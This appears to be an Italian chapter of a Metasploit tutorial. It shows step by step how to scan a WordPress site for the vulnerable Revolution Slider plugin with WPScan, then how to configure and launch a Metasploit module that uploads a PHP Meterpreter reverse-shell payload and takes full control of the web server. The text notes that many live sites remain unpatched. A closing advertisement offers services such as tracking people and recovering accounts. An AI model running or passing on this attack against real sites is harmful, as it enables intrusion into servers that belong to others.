In questo capitolo della guida su Metasploit Framework, sfruttiamo una vulnerabilità di Revolution Slider, un noto plugin per WordPress, per effettuare l’upload di un payload che aprirà una sessione di Meterpreter sul server che ospita il sito, garantendo all’attaccante il pieno controllo sulla macchina bersaglio.

Revolution Slider è uno dei plugin per creare slider di immagini su WordPress più comunemente usati e, nelle versioni precedenti alla 3.0.96, presenta una falla chiamata RFI (Remote File Inclusion) che permette a chiunque, anche agli utenti non registrati, l’inclusione di file da remoto. Sebbene nelle versioni più recenti, la falla sia stata riparata, ancora molti siti presentano versioni non aggiornate del plugin, inoltre è un’ottima occasione per dimostrare come sfruttare questo tipo di vulnerabilità con Metasploit.

Il sito vulnerabile

Prima di ogni cosa, dobbiamo accertarci che il sito che intendiamo attaccare presenti la vulnerabilità descritta sopra. Per farlo, utilizziamo WPScan, un software incluso in Kali Linux, descritto in uno degli articoli precedenti.

Avviamo WPScan per analizzare il sito in questione elencando i plugin vulnerabili con il seguente comando

wpscan -u [url_sito] -e vp

Dall’output di questo comando, possiamo chiaramente notare che RevSlider è presente e benché non riusciamo a capire quale versione sia installata, vale la pena tentare l’attacco.

Exploit web server - WPScan

Sfruttare RFI su WordPress e RevSlider con Metasploit

Partiamo avviando Metasploit in modalità MSFconsole con i soliti comandi

service postgresql start msfconsole

Avviato Metasploit, cerchiamo l’exploit che ci interessa e iniziamo ad utilizzarlo, digitando

search revslider use exploit/unix/webapp/wp_revslider_upload_execute

Exploit web server - Selezionare exploit

Vediamo le opzioni di configurazione dell’exploit e tutti i payload compatibili con esso

show options show payloads

Per questo tutorial ho scelto di utilizzare il payload php/meterpreter/reverse_tcp. Configuriamo l’exploit per l’attacco

set RHOST [indirizzo_ip_server_bersaglio] set VHOST [url_sito_bersaglio] set PAYLOAD php/meterpreter/reverse_tcp set LHOST [indirizzo_ip_attacker]

Exploit web server - Configurare exploit

Lanciamo l’attacco con il comando run o exploit, dopo pochi secondi si aprirà una sessione di Meterpreter sul server che ospita il sito.

Exploit web server - Lanciare attacco

 

Baty’s Base


Stai cercando prodotti per l’hacking, la sicurezza informatica e il penetration testing? Hai bisogno di bonificare il tuo smartphone, il tuo pc o il tuo sito da virus e malware? Devi rintracciare una persona o recuperare delle informazioni urgenti? Devi riprendere possesso di un account, una mail o di una password che ti hanno sottratto? Vuoi acquistare device già configurati per sperimentare tutte le tecniche di hacking in modo facile e veloce? Hai esigenze particolari in ambito software o hardware? Possiamo aiutarti!

Contattaci subito per avere un aiuto immediato : dettagliaci tramite mail o Whatsapp che tipo di supporto ti occorre e ti invieremo un riscontro immediato!

Compila e invia il modulo qui sotto per inviarci subito una richiesta di supporto

Scrivi il tuo indirizzo email qui

Scrivi qui come possiamo aiutarti – ti supportiamo immediatamente per ogni tua esigenza!